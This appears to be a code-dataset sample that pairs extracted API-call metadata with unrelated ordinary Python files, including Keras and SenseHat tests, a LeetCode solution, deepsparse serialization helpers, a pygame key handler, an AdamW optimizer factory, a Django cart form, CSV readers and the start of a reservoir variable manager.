[((389, 405), 'os.listdir', 'os.listdir', (['path'], {}), '(path)\n', (399, 405), False, 'import os\n'), ((477, 533), 'pandas.DataFrame', 'pd.DataFrame', (["{'file': [], 'shape': [], 'thickness': []}"], {}), "({'file': [], 'shape': [], 'thickness': []})\n", (489, 533), True, 'import pandas as pd\n'), ((439, 465), 'trescope.toolbox.simpleDisplayOutputs', 'simpleDisplayOutputs', (['(1)', '(4)'], {}), '(1, 4)\n', (459, 465), False, 'from trescope.toolbox import simpleDisplayOutputs\n'), ((411, 421), 'trescope.Trescope', 'Trescope', ([], {}), '()\n', (419, 421), False, 'from trescope import Trescope\n'), ((885, 898), 'trescope.config.ImageConfig', 'ImageConfig', ([], {}), '()\n', (896, 898), False, 'from trescope.config import ImageConfig\n'), ((1377, 1387), 'trescope.Trescope', 'Trescope', ([], {}), '()\n', (1385, 1387), False, 'from trescope import Trescope\n'), ((265, 275), 'trescope.Trescope', 'Trescope', ([], {}), '()\n', (273, 275), False, 'from trescope import Trescope\n'), ((836, 872), 'os.path.join', 'os.path.join', (['path', 'model_image_path'], {}), '(path, model_image_path)\n', (848, 872), False, 'import os\n'), ((784, 794), 'trescope.Trescope', 'Trescope', ([], {}), '()\n', (792, 794), False, 'from trescope import Trescope\n'), ((1253, 1266), 'trescope.controller.EnumControl', 'EnumControl', ([], {}), '()\n', (1264, 1266), False, 'from trescope.controller import EnumControl\n'), ((913, 923), 'trescope.Trescope', 'Trescope', ([], {}), '()\n', (921, 923), False, 'from trescope import Trescope\n'), ((1120, 1133), 'trescope.controller.EnumControl', 'EnumControl', ([], {}), '()\n', (1131, 1133), False, 'from trescope.controller import EnumControl\n'), ((994, 1007), 'trescope.controller.EnumControl', 'EnumControl', ([], {}), '()\n', (1005, 1007), False, 'from trescope.controller import EnumControl\n')]
|
import pytest
import numpy as np
from numpy.testing import assert_allclose
from keras.models import Sequential
from keras.layers.core import Dense, Activation, Flatten
from keras.layers.embeddings import Embedding
from keras.constraints import unitnorm
from keras import backend as K
X1 = np.array([[1], [2]], dtype='int32')
W1 = np.array([[0.1, 0.2], [0.3, 0.4], [0.5, 0.6]], dtype='float32')
def test_unitnorm_constraint():
    """Embedding weights under a unitnorm constraint should have unit L2 column
    norms after one training batch.

    NOTE(review): this uses the legacy Keras API (``W_constraint`` on
    ``Embedding``, ``class_mode`` on ``compile``) — presumably pre-1.0 Keras;
    confirm the installed version still accepts these arguments.
    """
    lookup = Sequential()
    lookup.add(Embedding(3, 2, weights=[W1],
                         W_constraint=unitnorm(),
                         input_length=1))
    lookup.add(Flatten())
    lookup.add(Dense(1))
    lookup.add(Activation('sigmoid'))
    lookup.compile(loss='binary_crossentropy', optimizer='sgd',
                   class_mode='binary')
    lookup.train_on_batch(X1, np.array([[1], [0]], dtype='int32'))
    # Column-wise L2 norms of the (constrained) embedding matrix should be ~1.
    norm = np.linalg.norm(K.get_value(lookup.trainable_weights[0]), axis=0)
    assert_allclose(norm, np.ones_like(norm).astype('float32'), rtol=1e-05)
# Allow running this test module directly (delegates to pytest).
if __name__ == '__main__':
    pytest.main([__file__])
|
[
"keras.layers.core.Dense",
"numpy.ones_like",
"keras.layers.core.Activation",
"pytest.main",
"keras.backend.get_value",
"keras.constraints.unitnorm",
"numpy.array",
"keras.layers.core.Flatten",
"keras.models.Sequential"
] |
[((291, 326), 'numpy.array', 'np.array', (['[[1], [2]]'], {'dtype': '"""int32"""'}), "([[1], [2]], dtype='int32')\n", (299, 326), True, 'import numpy as np\n'), ((332, 395), 'numpy.array', 'np.array', (['[[0.1, 0.2], [0.3, 0.4], [0.5, 0.6]]'], {'dtype': '"""float32"""'}), "([[0.1, 0.2], [0.3, 0.4], [0.5, 0.6]], dtype='float32')\n", (340, 395), True, 'import numpy as np\n'), ((443, 455), 'keras.models.Sequential', 'Sequential', ([], {}), '()\n', (453, 455), False, 'from keras.models import Sequential\n'), ((1038, 1061), 'pytest.main', 'pytest.main', (['[__file__]'], {}), '([__file__])\n', (1049, 1061), False, 'import pytest\n'), ((608, 617), 'keras.layers.core.Flatten', 'Flatten', ([], {}), '()\n', (615, 617), False, 'from keras.layers.core import Dense, Activation, Flatten\n'), ((634, 642), 'keras.layers.core.Dense', 'Dense', (['(1)'], {}), '(1)\n', (639, 642), False, 'from keras.layers.core import Dense, Activation, Flatten\n'), ((659, 680), 'keras.layers.core.Activation', 'Activation', (['"""sigmoid"""'], {}), "('sigmoid')\n", (669, 680), False, 'from keras.layers.core import Dense, Activation, Flatten\n'), ((816, 851), 'numpy.array', 'np.array', (['[[1], [0]]'], {'dtype': '"""int32"""'}), "([[1], [0]], dtype='int32')\n", (824, 851), True, 'import numpy as np\n'), ((879, 919), 'keras.backend.get_value', 'K.get_value', (['lookup.trainable_weights[0]'], {}), '(lookup.trainable_weights[0])\n', (890, 919), True, 'from keras import backend as K\n'), ((539, 549), 'keras.constraints.unitnorm', 'unitnorm', ([], {}), '()\n', (547, 549), False, 'from keras.constraints import unitnorm\n'), ((955, 973), 'numpy.ones_like', 'np.ones_like', (['norm'], {}), '(norm)\n', (967, 973), True, 'import numpy as np\n')]
|
import time
import pytest
from libs.sensorMod.src.sensor_SenseHat import Sensor
# =========================================================
# G L O B A L S & P Y T E S T F I X T U R E S
# =========================================================
@pytest.fixture()
def valid_attribs():
    """Baseline, valid attribute dict for constructing a Sensor instance."""
    return {
        'repeat': 1,        # Number of times to run speed test
        'holdTime': 60,     # Amount of time between tests
        'location': '- n/a -',
        'locationTZ': 'Etc/UTC',
        'tempUnit': 'C',    # Temp display unit: 'C' (Celsius), 'F' (Fahrenheit), 'K' (Kelvin)
        'enviro': True,     # Get environmental data (i.e. temperature, humidity, and pressure)
        'IMU': True,        # Get IMU (inertial measurement unit) data
    }
def _init_sensor(mocker, attribs):
    """Build a Sensor with every SenseHAT reading method (and time.sleep) mocked.

    Args:
        mocker: pytest-mock fixture used to patch the SenseHAT accessors.
        attribs: Sensor construction attributes (see ``valid_attribs``).

    Returns:
        A Sensor whose ``_sensehat`` getter methods are mocks, safe to call
        without real SenseHAT hardware.
    """
    sensor = Sensor(attribs)
    mocker.patch.object(sensor._sensehat, 'get_temperature')
    mocker.patch.object(sensor._sensehat, 'get_temperature_from_humidity')
    mocker.patch.object(sensor._sensehat, 'get_humidity')
    mocker.patch.object(sensor._sensehat, 'get_pressure')
    mocker.patch.object(sensor._sensehat, 'get_orientation')
    mocker.patch.object(sensor._sensehat, 'get_compass_raw')
    mocker.patch.object(sensor._sensehat, 'get_accelerometer_raw')
    mocker.patch.object(sensor._sensehat, 'get_gyroscope_raw')
    # Patch time.sleep so tests never actually wait.
    mocker.patch.object(time, 'sleep')
    return sensor
# =========================================================
# T E S T F U N C T I O N S
# =========================================================
@pytest.mark.smoke
def test_get_data(mocker, valid_attribs):
    """Smoke test: get_data must hit every mocked SenseHAT accessor exactly once."""
    attribs = valid_attribs
    sensor = _init_sensor(mocker, attribs)
    sensor.get_data()
    # One call per reading source: enviro (temperature/humidity/pressure) + IMU.
    sensor._sensehat.get_temperature.assert_called_once()
    sensor._sensehat.get_temperature_from_humidity.assert_called_once()
    sensor._sensehat.get_humidity.assert_called_once()
    sensor._sensehat.get_pressure.assert_called_once()
    sensor._sensehat.get_orientation.assert_called_once()
    sensor._sensehat.get_compass_raw.assert_called_once()
    sensor._sensehat.get_accelerometer_raw.assert_called_once()
    sensor._sensehat.get_gyroscope_raw.assert_called_once()
|
[
"pytest.fixture",
"libs.sensorMod.src.sensor_SenseHat.Sensor"
] |
[((260, 276), 'pytest.fixture', 'pytest.fixture', ([], {}), '()\n', (274, 276), False, 'import pytest\n'), ((806, 821), 'libs.sensorMod.src.sensor_SenseHat.Sensor', 'Sensor', (['attribs'], {}), '(attribs)\n', (812, 821), False, 'from libs.sensorMod.src.sensor_SenseHat import Sensor\n')]
|
"""
https://leetcode.com/problems/jewels-and-stones/
https://leetcode.com/submissions/detail/138688434/
"""
class Solution:
    """LeetCode 771 — Jewels and Stones."""

    def numJewelsInStones(self, J, S):
        """Count how many stones in S are jewels.

        :type J: str - jewel characters (distinct, per the problem statement)
        :type S: str - stones held
        :rtype: int

        Uses a set for O(len(J) + len(S)) instead of the O(len(J) * len(S))
        per-jewel ``str.count`` scan.
        """
        jewels = set(J)
        return sum(1 for stone in S if stone in jewels)
import unittest
class Test(unittest.TestCase):
    """Unit tests exercising the LeetCode sample cases."""

    def test(self):
        solution = Solution()
        for jewels, stones, expected in (('aA', 'aAAbbbb', 3), ('z', 'ZZ', 0)):
            self.assertEqual(solution.numJewelsInStones(jewels, stones), expected)
self.assertEqual(solution.numJewelsInStones('z', 'ZZ'), 0)
# Allow running the unit tests directly.
if __name__ == '__main__':
    unittest.main()
|
[
"unittest.main"
] |
[((628, 643), 'unittest.main', 'unittest.main', ([], {}), '()\n', (641, 643), False, 'import unittest\n')]
|
# Copyright (c) 2021 - present / Neuralmagic, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from typing import List
import numpy
from deepsparse.utils.log import log_init
__all__ = [
"arrays_to_bytes",
"bytes_to_arrays",
"verify_outputs",
]
log = log_init(os.path.basename(__file__))
def arrays_to_bytes(arrays: List[numpy.array]) -> bytearray:
    """
    :param arrays: List of numpy arrays to serialize as bytes
    :return: bytearray representation of list of numpy arrays

    Wire format per array: ``<dtype>|<dim,dim,...>|<raw C-order bytes>``.
    """
    separator = bytearray("|", "utf-8")
    serialized = bytearray()
    for array in arrays:
        dtype_field = bytearray(str(array.dtype), "utf-8")
        shape_field = bytearray(",".join(str(dim) for dim in array.shape), "utf-8")
        serialized += dtype_field + separator + shape_field + separator + array.ravel().tobytes()
    return serialized
def bytes_to_arrays(serialized_arr: bytearray) -> List[numpy.array]:
    """
    :param serialized_arr: bytearray representation of list of numpy arrays
    :return: List of numpy arrays decoded from input

    Inverse of ``arrays_to_bytes``: each record is ``dtype|shape|raw-bytes``.
    """
    delimiter = "|".encode("utf-8")
    decoded = []
    cursor = 0
    while cursor < len(serialized_arr) - 1:
        dtype_end = serialized_arr.find(delimiter, cursor)
        shape_end = serialized_arr.find(delimiter, dtype_end + 1)
        dtype = numpy.dtype(serialized_arr[cursor:dtype_end].decode("utf-8"))
        shape = tuple(
            int(dim)
            for dim in serialized_arr[dtype_end + 1 : shape_end].decode("utf-8").split(",")
        )
        num_bytes = int(numpy.prod(shape)) * dtype.itemsize
        data_start = shape_end + 1
        raw = serialized_arr[data_start : data_start + num_bytes]
        # Copy so the result does not alias the (possibly reused) input buffer.
        decoded.append(numpy.frombuffer(raw, dtype=dtype).reshape(shape).copy())
        cursor = data_start + num_bytes
    return decoded
def verify_outputs(
    outputs: List[numpy.array],
    gt_outputs: List[numpy.array],
    atol: float = 8.0e-4,
    rtol: float = 0.0,
) -> List[float]:
    """
    Compares two lists of output tensors, checking that they are sufficiently similar

    :param outputs: List of numpy arrays, usually model outputs
    :param gt_outputs: List of numpy arrays, usually reference outputs
    :param atol: Absolute tolerance for allclose
    :param rtol: Relative tolerance for allclose
    :return: The list of max differences for each pair of outputs
    """
    if len(outputs) != len(gt_outputs):
        raise Exception(
            f"number of outputs doesn't match, {len(outputs)} != {len(gt_outputs)}"
        )
    max_diffs = []
    # compare each pair elementwise; shape and type mismatches fail fast
    for i, (output, gt_output) in enumerate(zip(outputs, gt_outputs)):
        if output.shape != gt_output.shape:
            raise Exception(
                f"output shapes don't match, {output.shape} != {gt_output.shape}"
            )
        if type(output) != type(gt_output):
            raise Exception(
                f"output types don't match, {type(output)} != {type(gt_output)}"
            )
        max_diff = numpy.max(numpy.abs(output - gt_output))
        max_diffs.append(max_diff)
        log.info(f"output {i}: {output.shape} {gt_output.shape} MAX DIFF: {max_diff}")
        if not numpy.allclose(output, gt_output, rtol=rtol, atol=atol):
            raise Exception(
                "output data doesn't match\n"
                f"output {i}: {output.shape} {gt_output.shape} MAX DIFF: {max_diff}\n"
                f" mean = {numpy.mean(output):.5f} {numpy.mean(gt_output):.5f}\n"
                f" std = {numpy.std(output):.5f} {numpy.std(gt_output):.5f}\n"
                f" max = {numpy.max(output):.5f} {numpy.max(gt_output):.5f}\n"
                f" min = {numpy.min(output):.5f} {numpy.min(gt_output):.5f}"
            )
    return max_diffs
|
[
"numpy.abs",
"os.path.basename",
"numpy.std",
"numpy.frombuffer",
"numpy.allclose",
"numpy.max",
"numpy.mean",
"numpy.min",
"numpy.prod"
] |
[((809, 835), 'os.path.basename', 'os.path.basename', (['__file__'], {}), '(__file__)\n', (825, 835), False, 'import os\n'), ((2036, 2057), 'numpy.prod', 'numpy.prod', (['arr_shape'], {}), '(arr_shape)\n', (2046, 2057), False, 'import numpy\n'), ((3524, 3553), 'numpy.abs', 'numpy.abs', (['(output - gt_output)'], {}), '(output - gt_output)\n', (3533, 3553), False, 'import numpy\n'), ((3693, 3748), 'numpy.allclose', 'numpy.allclose', (['output', 'gt_output'], {'rtol': 'rtol', 'atol': 'atol'}), '(output, gt_output, rtol=rtol, atol=atol)\n', (3707, 3748), False, 'import numpy\n'), ((2163, 2205), 'numpy.frombuffer', 'numpy.frombuffer', (['arr_str'], {'dtype': 'arr_dtype'}), '(arr_str, dtype=arr_dtype)\n', (2179, 2205), False, 'import numpy\n'), ((3942, 3960), 'numpy.mean', 'numpy.mean', (['output'], {}), '(output)\n', (3952, 3960), False, 'import numpy\n'), ((3967, 3988), 'numpy.mean', 'numpy.mean', (['gt_output'], {}), '(gt_output)\n', (3977, 3988), False, 'import numpy\n'), ((4027, 4044), 'numpy.std', 'numpy.std', (['output'], {}), '(output)\n', (4036, 4044), False, 'import numpy\n'), ((4051, 4071), 'numpy.std', 'numpy.std', (['gt_output'], {}), '(gt_output)\n', (4060, 4071), False, 'import numpy\n'), ((4110, 4127), 'numpy.max', 'numpy.max', (['output'], {}), '(output)\n', (4119, 4127), False, 'import numpy\n'), ((4134, 4154), 'numpy.max', 'numpy.max', (['gt_output'], {}), '(gt_output)\n', (4143, 4154), False, 'import numpy\n'), ((4193, 4210), 'numpy.min', 'numpy.min', (['output'], {}), '(output)\n', (4202, 4210), False, 'import numpy\n'), ((4217, 4237), 'numpy.min', 'numpy.min', (['gt_output'], {}), '(gt_output)\n', (4226, 4237), False, 'import numpy\n')]
|
import sys
import pygame as pg
from ui.input import control
def check_keyboard_events(window, state):
    """
    Drain the pygame event queue and run the UI action bound to each key press.

    QUIT events and ESC close the application; every other supported key is
    dispatched through a key -> callback table. Unbound keys are ignored.

    :param window: UI window object forwarded to the control handlers
    :param state: application state forwarded to the control handlers
    :return: the list of pygame events that were fetched this call
    """
    def close():
        pg.quit()
        sys.exit()

    bindings = {
        pg.K_ESCAPE: close,
        pg.K_RETURN: lambda: control.central_button(window, state),
        pg.K_UP: lambda: control.scroll_menu_up(window, state),
        pg.K_DOWN: lambda: control.scroll_menu_down(window, state),
        pg.K_q: lambda: control.back(window, state),
        pg.K_w: lambda: control.switch_audio(window, state),
        pg.K_e: lambda: control.switch_led(window, state),
        pg.K_r: lambda: control.open_setting(window, state),
        pg.K_1: lambda: control.play_favourite(window, state, 1),
        pg.K_2: lambda: control.play_favourite(window, state, 2),
        pg.K_3: lambda: control.play_favourite(window, state, 3),
        pg.K_4: lambda: control.play_favourite(window, state, 4),
        pg.K_5: lambda: control.play_favourite(window, state, 5),
        pg.K_6: lambda: control.play_favourite(window, state, 6),
        pg.K_7: lambda: control.play_favourite(window, state, 7),
    }

    events = pg.event.get()
    for event in events:
        if event.type == pg.QUIT:
            close()
        elif event.type == pg.KEYDOWN and event.key in bindings:
            bindings[event.key]()
    return events
|
[
"pygame.quit",
"ui.input.control.switch_audio",
"pygame.event.get",
"ui.input.control.open_setting",
"ui.input.control.play_favourite",
"ui.input.control.scroll_menu_down",
"ui.input.control.central_button",
"ui.input.control.back",
"sys.exit",
"ui.input.control.switch_led",
"ui.input.control.scroll_menu_up"
] |
[((174, 188), 'pygame.event.get', 'pg.event.get', ([], {}), '()\n', (186, 188), True, 'import pygame as pg\n'), ((131, 140), 'pygame.quit', 'pg.quit', ([], {}), '()\n', (138, 140), True, 'import pygame as pg\n'), ((149, 159), 'sys.exit', 'sys.exit', ([], {}), '()\n', (157, 159), False, 'import sys\n'), ((439, 476), 'ui.input.control.central_button', 'control.central_button', (['window', 'state'], {}), '(window, state)\n', (461, 476), False, 'from ui.input import control\n'), ((553, 590), 'ui.input.control.scroll_menu_up', 'control.scroll_menu_up', (['window', 'state'], {}), '(window, state)\n', (575, 590), False, 'from ui.input import control\n'), ((669, 708), 'ui.input.control.scroll_menu_down', 'control.scroll_menu_down', (['window', 'state'], {}), '(window, state)\n', (693, 708), False, 'from ui.input import control\n'), ((785, 812), 'ui.input.control.back', 'control.back', (['window', 'state'], {}), '(window, state)\n', (797, 812), False, 'from ui.input import control\n'), ((888, 923), 'ui.input.control.switch_audio', 'control.switch_audio', (['window', 'state'], {}), '(window, state)\n', (908, 923), False, 'from ui.input import control\n'), ((999, 1032), 'ui.input.control.switch_led', 'control.switch_led', (['window', 'state'], {}), '(window, state)\n', (1017, 1032), False, 'from ui.input import control\n'), ((1108, 1143), 'ui.input.control.open_setting', 'control.open_setting', (['window', 'state'], {}), '(window, state)\n', (1128, 1143), False, 'from ui.input import control\n'), ((1220, 1260), 'ui.input.control.play_favourite', 'control.play_favourite', (['window', 'state', '(1)'], {}), '(window, state, 1)\n', (1242, 1260), False, 'from ui.input import control\n'), ((1336, 1376), 'ui.input.control.play_favourite', 'control.play_favourite', (['window', 'state', '(2)'], {}), '(window, state, 2)\n', (1358, 1376), False, 'from ui.input import control\n'), ((1452, 1492), 'ui.input.control.play_favourite', 'control.play_favourite', (['window', 'state', '(3)'], 
{}), '(window, state, 3)\n', (1474, 1492), False, 'from ui.input import control\n'), ((1568, 1608), 'ui.input.control.play_favourite', 'control.play_favourite', (['window', 'state', '(4)'], {}), '(window, state, 4)\n', (1590, 1608), False, 'from ui.input import control\n'), ((1684, 1724), 'ui.input.control.play_favourite', 'control.play_favourite', (['window', 'state', '(5)'], {}), '(window, state, 5)\n', (1706, 1724), False, 'from ui.input import control\n'), ((1800, 1840), 'ui.input.control.play_favourite', 'control.play_favourite', (['window', 'state', '(6)'], {}), '(window, state, 6)\n', (1822, 1840), False, 'from ui.input import control\n'), ((1916, 1956), 'ui.input.control.play_favourite', 'control.play_favourite', (['window', 'state', '(7)'], {}), '(window, state, 7)\n', (1938, 1956), False, 'from ui.input import control\n')]
|
# -*- coding:utf-8 -*-
# Author: hankcs
# Date: 2019-11-11 18:44
import tensorflow as tf
from elit.optimizers.adamw.optimization import WarmUp, AdamWeightDecay
# from elit.optimization.adamw.optimizers_v2 import AdamW
# from elit.optimization.adamw.utils import get_weight_decays
# def create_optimizer(model, init_lr, num_train_steps, num_warmup_steps):
# """Creates an optimizer with learning rate schedule."""
# wd_dict = get_weight_decays(model)
#
# # Implements linear decay of the learning rate.
# learning_rate_fn = tf.keras.optimizers.schedules.PolynomialDecay(
# initial_learning_rate=init_lr,
# decay_steps=num_train_steps,
# end_learning_rate=0.0)
# if num_warmup_steps:
# learning_rate_fn = WarmUp(initial_learning_rate=init_lr,
# decay_schedule_fn=learning_rate_fn,
# warmup_steps=num_warmup_steps)
# optimizer = AdamW(
# learning_rate=learning_rate_fn,
# weight_decay_rate=0.01,
# beta_1=0.9,
# beta_2=0.999,
# epsilon=1e-6,
# exclude_from_weight_decay=['layer_norm', 'bias'])
# return optimizer
def create_optimizer(init_lr, num_train_steps, num_warmup_steps, weight_decay_rate=0.01, epsilon=1e-6, clipnorm=None):
    """Creates an optimizer with learning rate schedule.

    Builds a polynomial-decay schedule, optionally preceded by a linear
    warm-up phase, and wraps it in an ``AdamWeightDecay`` optimizer that
    excludes layer-norm weights and biases from weight decay.

    Args:
        init_lr: initial learning rate fed to the schedule
        num_train_steps: number of steps the schedule decays over
        num_warmup_steps: warm-up step count; falsy disables warm-up
        weight_decay_rate: (Default value = 0.01)
        epsilon: (Default value = 1e-6)
        clipnorm: (Default value = None)

    Returns:
        A configured ``AdamWeightDecay`` optimizer instance.
    """
    # Implements linear decay of the learning rate.
    schedule = tf.keras.optimizers.schedules.PolynomialDecay(
        initial_learning_rate=init_lr,
        decay_steps=num_train_steps,
        end_learning_rate=0.0,
    )
    if num_warmup_steps:
        schedule = WarmUp(
            initial_learning_rate=init_lr,
            decay_schedule_fn=schedule,
            warmup_steps=num_warmup_steps,
        )
    extra_kwargs = {'clipnorm': clipnorm} if clipnorm else {}
    # {'LayerNorm/gamma:0', 'LayerNorm/beta:0'}
    return AdamWeightDecay(
        learning_rate=schedule,
        weight_decay_rate=weight_decay_rate,
        beta_1=0.9,
        beta_2=0.999,
        epsilon=epsilon,
        exclude_from_weight_decay=['LayerNorm', 'bias'],
        **extra_kwargs,
    )
|
[
"elit.optimizers.adamw.optimization.AdamWeightDecay",
"elit.optimizers.adamw.optimization.WarmUp",
"tensorflow.keras.optimizers.schedules.PolynomialDecay"
] |
[((1670, 1802), 'tensorflow.keras.optimizers.schedules.PolynomialDecay', 'tf.keras.optimizers.schedules.PolynomialDecay', ([], {'initial_learning_rate': 'init_lr', 'decay_steps': 'num_train_steps', 'end_learning_rate': '(0.0)'}), '(initial_learning_rate=init_lr,\n decay_steps=num_train_steps, end_learning_rate=0.0)\n', (1715, 1802), True, 'import tensorflow as tf\n'), ((2154, 2358), 'elit.optimizers.adamw.optimization.AdamWeightDecay', 'AdamWeightDecay', ([], {'learning_rate': 'learning_rate_fn', 'weight_decay_rate': 'weight_decay_rate', 'beta_1': '(0.9)', 'beta_2': '(0.999)', 'epsilon': 'epsilon', 'exclude_from_weight_decay': "['LayerNorm', 'bias']"}), "(learning_rate=learning_rate_fn, weight_decay_rate=\n weight_decay_rate, beta_1=0.9, beta_2=0.999, epsilon=epsilon,\n exclude_from_weight_decay=['LayerNorm', 'bias'], **additional_args)\n", (2169, 2358), False, 'from elit.optimizers.adamw.optimization import WarmUp, AdamWeightDecay\n'), ((1876, 1984), 'elit.optimizers.adamw.optimization.WarmUp', 'WarmUp', ([], {'initial_learning_rate': 'init_lr', 'decay_schedule_fn': 'learning_rate_fn', 'warmup_steps': 'num_warmup_steps'}), '(initial_learning_rate=init_lr, decay_schedule_fn=learning_rate_fn,\n warmup_steps=num_warmup_steps)\n', (1882, 1984), False, 'from elit.optimizers.adamw.optimization import WarmUp, AdamWeightDecay\n')]
|
from django import forms
from crispy_forms.helper import FormHelper
from crispy_forms.layout import (
Column,
HTML,
Field,
Fieldset,
Layout,
Row,
Submit,
BaseInput,
)
from crispy_forms.bootstrap import InlineField, UneditableField
from crispy_forms import layout
# (value, label) pairs for quantities 1..199, used by quantity choice fields.
PRODUCT_QUANTITY_CHOICES = [(i, str(i)) for i in range(1, 200)]
class CartAddProductForm(forms.Form):
    """Form for adding a product with a chosen quantity to the cart."""

    # Free-text quantity box coerced to int; optional so an empty submission
    # is left to the view's default handling.
    quantity = forms.TypedChoiceField(
        choices=PRODUCT_QUANTITY_CHOICES,
        coerce=int,
        required=False,
        widget=forms.TextInput(
            attrs={'class': 'qty', 'style': 'width:60px; padding: 8.7px;'}
        ),
    )
    # Hidden flag distinguishing "update existing cart line" from "add new".
    update = forms.BooleanField(
        widget=forms.HiddenInput(), initial=False, required=False
    )

    def __init__(self, *args, **kwargs):
        """Attach a crispy-forms helper rendering the qty input and submit button."""
        super().__init__(*args, **kwargs)
        quantity_input = BaseInput(
            "quantity", value=1, style="width:50px;", add_class="qty"
        )
        submit_button = Submit(
            "Add To Cart", "Add to Cart", css_class="add-to-cart button m-0"
        )
        self.helper = FormHelper()
        self.helper.layout = Layout(quantity_input, submit_button)
# class ListCartAddProductForm(forms.Form):
# quantity = forms.TypedChoiceField(
# choices=PRODUCT_QUANTITY_CHOICES,
# coerce=int,
# required=False,
# widget=forms.TextInput(attrs={'class': 'qty', 'style':'width:60px; padding: 8.7px;'})
# )
# update = forms.BooleanField(
# widget=forms.HiddenInput(), initial=False, required=False
# )
# def __init__(self, *args, **kwargs):
# super().__init__(*args, **kwargs)
# self.helper = FormHelper()
# self.helper.layout = Layout(
# BaseInput("quantity", value=1, style="width:50px;", add_class="qty"),
# Submit("Add To Cart", "Add To Cart", css_class="add-to-cart button m-0"),
# )
# <i class="icon-shopping-cart"></i>
|
[
"crispy_forms.layout.BaseInput",
"crispy_forms.helper.FormHelper",
"django.forms.TextInput",
"django.forms.HiddenInput",
"crispy_forms.layout.Submit"
] |
[((837, 849), 'crispy_forms.helper.FormHelper', 'FormHelper', ([], {}), '()\n', (847, 849), False, 'from crispy_forms.helper import FormHelper\n'), ((541, 620), 'django.forms.TextInput', 'forms.TextInput', ([], {'attrs': "{'class': 'qty', 'style': 'width:60px; padding: 8.7px;'}"}), "(attrs={'class': 'qty', 'style': 'width:60px; padding: 8.7px;'})\n", (556, 620), False, 'from django import forms\n'), ((674, 693), 'django.forms.HiddenInput', 'forms.HiddenInput', ([], {}), '()\n', (691, 693), False, 'from django import forms\n'), ((899, 967), 'crispy_forms.layout.BaseInput', 'BaseInput', (['"""quantity"""'], {'value': '(1)', 'style': '"""width:50px;"""', 'add_class': '"""qty"""'}), "('quantity', value=1, style='width:50px;', add_class='qty')\n", (908, 967), False, 'from crispy_forms.layout import Column, HTML, Field, Fieldset, Layout, Row, Submit, BaseInput\n'), ((981, 1053), 'crispy_forms.layout.Submit', 'Submit', (['"""Add To Cart"""', '"""Add to Cart"""'], {'css_class': '"""add-to-cart button m-0"""'}), "('Add To Cart', 'Add to Cart', css_class='add-to-cart button m-0')\n", (987, 1053), False, 'from crispy_forms.layout import Column, HTML, Field, Fieldset, Layout, Row, Submit, BaseInput\n')]
|
"""This module contains boilerplate csv helpers."""
import csv
def read_csv(filename):
    """Read a CSV file.

    **Example**:

        >>> read_csv('/path/to/data.csv')
        [{ 'name': 'foo' }]

    :param filename:
        Path to CSV file.

    :return:
        A Python representation of the CSV document (a list of dicts, one
        per data row, keyed by the header fields).
    """
    # Let csv.DictReader parse the header row itself: the previous manual
    # replace('"', '').split(",") broke on quoted header fields containing
    # commas, which the csv module handles correctly. newline='' is the
    # documented way to open files passed to the csv module.
    with open(filename, newline="") as fh:
        return [dict(row) for row in csv.DictReader(fh)]
def iter_csv(filename):
    """Iterate a CSV file.

    **Example**:

        >>> for item in iter_csv('/path/to/data.csv'):
        ...     print(item)
        [{ 'name': 'foo' }]

    :param filename:
        Path to CSV file.

    :yield:
        A Python ``dict`` representation of a CSV row, keyed by the header
        fields.
    """
    # Let csv.DictReader parse the header row itself: the previous manual
    # replace('"', '').split(",") broke on quoted header fields containing
    # commas, which the csv module handles correctly. newline='' is the
    # documented way to open files passed to the csv module.
    with open(filename, newline="") as fh:
        for row in csv.DictReader(fh):
            yield dict(row)
|
[
"csv.DictReader"
] |
[((475, 517), 'csv.DictReader', 'csv.DictReader', (['fh'], {'fieldnames': 'field_names'}), '(fh, fieldnames=field_names)\n', (489, 517), False, 'import csv\n'), ((1025, 1067), 'csv.DictReader', 'csv.DictReader', (['fh'], {'fieldnames': 'field_names'}), '(fh, fieldnames=field_names)\n', (1039, 1067), False, 'import csv\n')]
|
from datetime import date
import numpy as np
from matplotlib.lines import Line2D
from _ids import *
import _icons as ico
from utilities import pydate2wxdate, wxdate2pydate, GetAttributes
from properties import SummaryProperty
class VariableManager:
    """Registry of every simulation and configuration variable.

    Instantiates one object per variable type (potentials, rates,
    cumulatives, ratios, scalers, statics, ...) for the given unit system,
    stores user-defined summary variables in a dict keyed by integer id, and
    maintains a square correlation matrix over the scaler/static variables.
    """

    def __init__(self, unit_system):
        """Create every variable for the given unit system.

        :param unit_system: unit system handed to each variable constructor.
            NOTE(review): the concrete variable classes (Time, OilRate, ...)
            are not defined in this module -- presumably supplied by the
            ``from _ids import *`` star import; verify.
        """
        # simulation dependent -----------------------------------------------------------------------------------------
        # times
        self._time = Time()
        self._date = Date()
        # potentials
        self._oil_potential = OilPotential(unit_system)
        self._gas_potential = GasPotential(unit_system)
        self._water_potential = WaterPotential(unit_system)
        self._liquid_potential = LiquidPotential(unit_system)
        self._lift_gas_potential = LiftGasPotential(unit_system)
        self._gas_injection_potential = GasInjectionPotential(unit_system)
        self._water_injection_potential = WaterInjectionPotential(unit_system)
        self._total_gas_potential = TotalGasPotential(unit_system)
        # rates
        self._oil_rate = OilRate(unit_system)
        self._gas_rate = GasRate(unit_system)
        self._water_rate = WaterRate(unit_system)
        self._liquid_rate = LiquidRate(unit_system)
        self._lift_gas_rate = LiftGasRate(unit_system)
        self._gas_injection_rate = GasInjectionRate(unit_system)
        self._water_injection_rate = WaterInjectionRate(unit_system)
        self._total_gas_rate = TotalGasRate(unit_system)
        # cumulatives
        self._oil_cumulative = OilCumulative(unit_system)
        self._gas_cumulative = GasCumulative(unit_system)
        self._water_cumulative = WaterCumulative(unit_system)
        self._liquid_cumulative = LiquidCumulative(unit_system)
        self._lift_gas_cumulative = LiftGasCumulative(unit_system)
        self._gas_injection_cumulative = GasInjectionCumulative(unit_system)
        self._water_injection_cumulative = WaterInjectionCumulative(unit_system)
        self._total_gas_cumulative = TotalGasCumulative(unit_system)
        # ratios
        self._water_cut = WaterCut(unit_system)
        self._oil_cut = OilCut(unit_system)
        self._gas_oil_ratio = GasOilRatio(unit_system)
        self._water_oil_ratio = WaterOilRatio(unit_system)
        self._gas_liquid_ratio = GasLiquidRatio(unit_system)
